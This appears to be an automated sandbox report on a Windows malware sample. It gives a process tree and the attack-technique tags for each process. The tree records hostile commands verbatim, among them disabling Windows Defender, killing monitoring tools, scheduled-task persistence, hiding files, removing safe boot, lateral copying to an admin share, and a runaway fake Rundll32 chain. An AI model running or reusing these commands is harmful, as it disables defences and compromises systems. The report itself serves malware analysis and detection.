1608 wrote to memory of 4476 1608 FILE5.EXE 88 PID 5340 wrote to memory of 2216 5340 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 89 PID 5340 wrote to memory of 2216 5340 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 89 PID 5340 wrote to memory of 2216 5340 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 89 PID 1608 wrote to memory of 2392 1608 FILE5.EXE 90 PID 1608 wrote to memory of 2392 1608 FILE5.EXE 90 PID 1608 wrote to memory of 2392 1608 FILE5.EXE 90 PID 5924 wrote to memory of 1940 5924 WScript.exe 91 PID 5924 wrote to memory of 1940 5924 WScript.exe 91 PID 5924 wrote to memory of 1940 5924 WScript.exe 91 PID 1608 wrote to memory of 5436 1608 FILE5.EXE 92 PID 1608 wrote to memory of 5436 1608 FILE5.EXE 92 PID 1608 wrote to memory of 5436 1608 FILE5.EXE 92 PID 1608 wrote to memory of 2156 1608 FILE5.EXE 94 PID 1608 wrote to memory of 2156 1608 FILE5.EXE 94 PID 1608 wrote to memory of 2156 1608 FILE5.EXE 94 PID 4416 wrote to memory of 4676 4416 SENDE2R.EXE 97 PID 4416 wrote to memory of 4676 4416 SENDE2R.EXE 97 PID 4416 wrote to memory of 4676 4416 SENDE2R.EXE 97 PID 2792 wrote to memory of 4076 2792 WScript.exe 98 PID 2792 wrote to memory of 4076 2792 WScript.exe 98 PID 2792 wrote to memory of 4076 2792 WScript.exe 98 PID 5388 wrote to memory of 3020 5388 WScript.exe 240 PID 5388 wrote to memory of 3020 5388 WScript.exe 240 PID 5388 wrote to memory of 3020 5388 WScript.exe 240 PID 5388 wrote to memory of 6016 5388 WScript.exe 106 PID 5388 wrote to memory of 6016 5388 WScript.exe 106 PID 5388 wrote to memory of 6016 5388 WScript.exe 106 PID 5296 wrote to memory of 1712 5296 LEGIT_SOFTWARE2.EXE 108 PID 5296 wrote to memory of 1712 5296 LEGIT_SOFTWARE2.EXE 108 PID 4288 wrote to memory of 2536 4288 LEGIT_SOFTWARE1.EXE 109 PID 4288 wrote to memory of 2536 4288 LEGIT_SOFTWARE1.EXE 109 -
Views/modifies file attributes 1 TTPs 5 IoCs
pid Process 2164 attrib.exe 244 attrib.exe 4644 attrib.exe 1780 attrib.exe 3440 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe"C:\Users\Admin\AppData\Local\Temp\9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe"1⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:5340 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\EXECUTION.JS"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5924 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵
- System Location Discovery: System Language Discovery
PID:1940
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:2424
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:2164
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵
- System Location Discovery: System Language Discovery
PID:2476
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵
- System Location Discovery: System Language Discovery
PID:484
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:2276
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:4276
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:1036
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:4520
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:5152
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:5656
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:2064
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:4560
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:4268
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:2988
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:1220
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:5668
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:2624
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:1008
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:4472
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:4908
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:5740
-
-
-
C:\Users\Admin\AppData\Local\Temp\FILE5.EXE"C:\Users\Admin\AppData\Local\Temp\FILE5.EXE"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1608 -
C:\Program Files (x86)\ULTIME MULTIHACK REBORN.EXE"C:\Program Files (x86)\ULTIME MULTIHACK REBORN.EXE"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4476
-
-
C:\Program Files (x86)\VLC1.EXE"C:\Program Files (x86)\VLC1.EXE"3⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:2392 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k attrib "C:\Program Files (x86)\VLC1.EXE" +s +h4⤵PID:5700
-
C:\Windows\SysWOW64\attrib.exeattrib "C:\Program Files (x86)\VLC1.EXE" +s +h5⤵
- Sets file to hidden
- Drops file in Program Files directory
- Views/modifies file attributes
PID:3440
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k attrib "C:\Program Files (x86)" +s +h4⤵PID:1140
-
C:\Windows\SysWOW64\attrib.exeattrib "C:\Program Files (x86)" +s +h5⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2164
-
-
-
C:\Users\Admin\Documents\MSDCSC\msdcsc.exe"C:\Users\Admin\Documents\MSDCSC\msdcsc.exe"4⤵
- Executes dropped EXE
PID:2244
-
-
-
C:\Program Files (x86)\WINDOWS DEFENDER.EXE"C:\Program Files (x86)\WINDOWS DEFENDER.EXE"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:5436 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "csrss" /tr '"C:\Users\Admin\AppData\Roaming\csrss.exe"' & exit4⤵
- System Location Discovery: System Language Discovery
PID:5152 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "csrss" /tr '"C:\Users\Admin\AppData\Roaming\csrss.exe"'5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1364
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp9EC0.tmp.bat""4⤵
- System Location Discovery: System Language Discovery
PID:248 -
C:\Windows\SysWOW64\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
PID:6036
-
-
C:\Users\Admin\AppData\Roaming\csrss.exe"C:\Users\Admin\AppData\Roaming\csrss.exe"5⤵
- Executes dropped EXE
PID:2436
-
-
-
-
C:\Program Files (x86)\WINDOWS SECURITY NANO.EXE"C:\Program Files (x86)\WINDOWS SECURITY NANO.EXE"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:2156
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FINDM10E.VBS"2⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:5388 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +s +h C:\Windows\Temp\svchost_533423.exe3⤵PID:3020
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h C:\Windows\Temp\svchost_533423.exe4⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:1780
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Stop-Service WinDefend -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6016
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Stop-Process -Name taskmgr.exe -Force3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4444
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Stop-Process -Name cmd.exe -Force3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2008
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Stop-Process -Name regedit.exe -Force3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1064
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Stop-Process -Name procexp.exe -Force3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2332
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Stop-Process -Name processhacker.exe -Force3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4276
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /deletevalue {current} safeboot3⤵PID:5572
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Power /v HiberbootEnabled /t REG_DWORD /d 0 /f3⤵
- System Location Discovery: System Language Discovery
PID:1984 -
C:\Windows\SysWOW64\reg.exereg add HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Power /v HiberbootEnabled /t REG_DWORD /d 0 /f4⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:4568
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cipher /e /s:C:\Windows\Temp\3⤵
- System Location Discovery: System Language Discovery
PID:5496 -
C:\Windows\SysWOW64\cipher.execipher /e /s:C:\Windows\Temp\4⤵
- System Location Discovery: System Language Discovery
PID:6032
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +s +h C:\Users\Admin\AppData\Local\findme_579518.exe3⤵
- System Location Discovery: System Language Discovery
PID:4164 -
C:\Windows\SysWOW64\attrib.exeattrib +s +h C:\Users\Admin\AppData\Local\findme_579518.exe4⤵
- Sets file to hidden
- Views/modifies file attributes
PID:244
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b C:\Users\Admin\AppData\Local\findme_579518.exe3⤵PID:5408
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\INSTALLE10R.VBS"2⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2792 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +s +h C:\Users\Public\Documents\winservice_533423.exe3⤵
- System Location Discovery: System Language Discovery
PID:4076 -
C:\Windows\SysWOW64\attrib.exeattrib +s +h C:\Users\Public\Documents\winservice_533423.exe4⤵
- Sets file to hidden
- Views/modifies file attributes
PID:4644
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\JOKE.EXE"C:\Users\Admin\AppData\Local\Temp\JOKE.EXE"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4212
-
-
C:\Users\Admin\AppData\Local\Temp\JOKE2.EXE"C:\Users\Admin\AppData\Local\Temp\JOKE2.EXE"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5672
-
-
C:\Users\Admin\AppData\Local\Temp\LEGIT_SOFTWARE1.EXE"C:\Users\Admin\AppData\Local\Temp\LEGIT_SOFTWARE1.EXE"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4288 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8397.tmp\8398.tmp\8399.bat C:\Users\Admin\AppData\Local\Temp\LEGIT_SOFTWARE1.EXE"3⤵
- Modifies registry class
PID:2536 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\msgbx.vbs"4⤵PID:3640
-
-
C:\Windows\system32\net.exenet stop "WSearch"4⤵PID:4584
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WSearch"5⤵PID:2972
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "START PAGE" /d "https://watchfurry4k.com"4⤵
- Modifies Internet Explorer settings
PID:5936
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\LEGIT_SOFTWARE2.EXE"C:\Users\Admin\AppData\Local\Temp\LEGIT_SOFTWARE2.EXE"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5296 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\83A7.tmp\83A8.tmp\83A9.bat C:\Users\Admin\AppData\Local\Temp\LEGIT_SOFTWARE2.EXE"3⤵PID:1712
-
C:\Windows\system32\timeout.exetimeout /t 3 /nobreak4⤵
- Delays execution with timeout.exe
PID:4780
-
-
C:\Windows\system32\timeout.exetimeout /t 3 /nobreak4⤵
- Delays execution with timeout.exe
PID:1820
-
-
C:\Windows\system32\timeout.exetimeout /t 3 /nobreak4⤵
- Delays execution with timeout.exe
PID:3588
-
-
C:\Windows\system32\timeout.exetimeout /t 3 /nobreak4⤵
- Delays execution with timeout.exe
PID:3412
-
-
C:\Windows\system32\timeout.exetimeout /t 3 /nobreak4⤵
- Delays execution with timeout.exe
PID:5124
-
-
C:\Windows\system32\timeout.exetimeout /t 3 /nobreak4⤵
- Delays execution with timeout.exe
PID:5324
-
-
C:\Windows\system32\timeout.exetimeout /t 3 /nobreak4⤵
- Delays execution with timeout.exe
PID:5980
-
-
C:\Windows\system32\timeout.exetimeout /t 3 /nobreak4⤵
- Delays execution with timeout.exe
PID:4744
-
-
C:\Windows\system32\timeout.exetimeout /t 3 /nobreak4⤵
- Delays execution with timeout.exe
PID:4824
-
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\LOL.VBS"2⤵PID:5076
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sys32.hta \\BFFC-PC\C$\Users\Public\sys32.hta3⤵
- System Location Discovery: System Language Discovery
PID:3404
-
-
-
C:\Users\Admin\AppData\Local\Temp\SENDE2R.EXE"C:\Users\Admin\AppData\Local\Temp\SENDE2R.EXE"2⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4416 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:4676 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"4⤵
- Executes dropped EXE
PID:1872 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"5⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:6068 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"6⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:1608 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"7⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:2996 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"8⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:708 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"9⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:5448 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"10⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:3636 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"11⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:4568 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"12⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:3108 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"13⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:4188 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"14⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:6044 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"15⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:6104 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"16⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:3360 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"17⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:4396 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"18⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:708 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"19⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:4824 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"20⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3404 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"21⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5076 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"22⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:2244 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"23⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:1216 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"24⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:3984 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"25⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:3924 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"26⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:4584 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"27⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:5944 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"28⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:1932 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"29⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:3456 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"30⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:2276 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"31⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:4960 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"32⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3536 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"33⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:2012 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"34⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:5392 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"35⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:4804 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"36⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:4908 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"37⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:3308 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"38⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1384 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"39⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:4436 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"40⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:32 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"41⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:1984 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"42⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:2000 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"43⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:5104 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"44⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:2748 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"45⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:580 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"46⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:1536 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"47⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:5192 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"48⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:3360 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"49⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2248 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"50⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:4164 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"51⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:3168 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"52⤵
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:2376 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"53⤵
- Drops file in System32 directory
PID:1944 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"54⤵
- Drops file in System32 directory
PID:4112 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"55⤵
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:4944 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"56⤵
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:3340 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"57⤵
- Drops file in System32 directory
PID:3640 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"58⤵
- Drops file in System32 directory
PID:5400 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"59⤵
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:5324 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"60⤵
- Drops file in System32 directory
PID:1364 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"61⤵
- Drops file in System32 directory
PID:5904 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"62⤵
- Drops file in System32 directory
PID:3020 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"63⤵
- Drops file in System32 directory
PID:5088 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"64⤵
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:1324 -
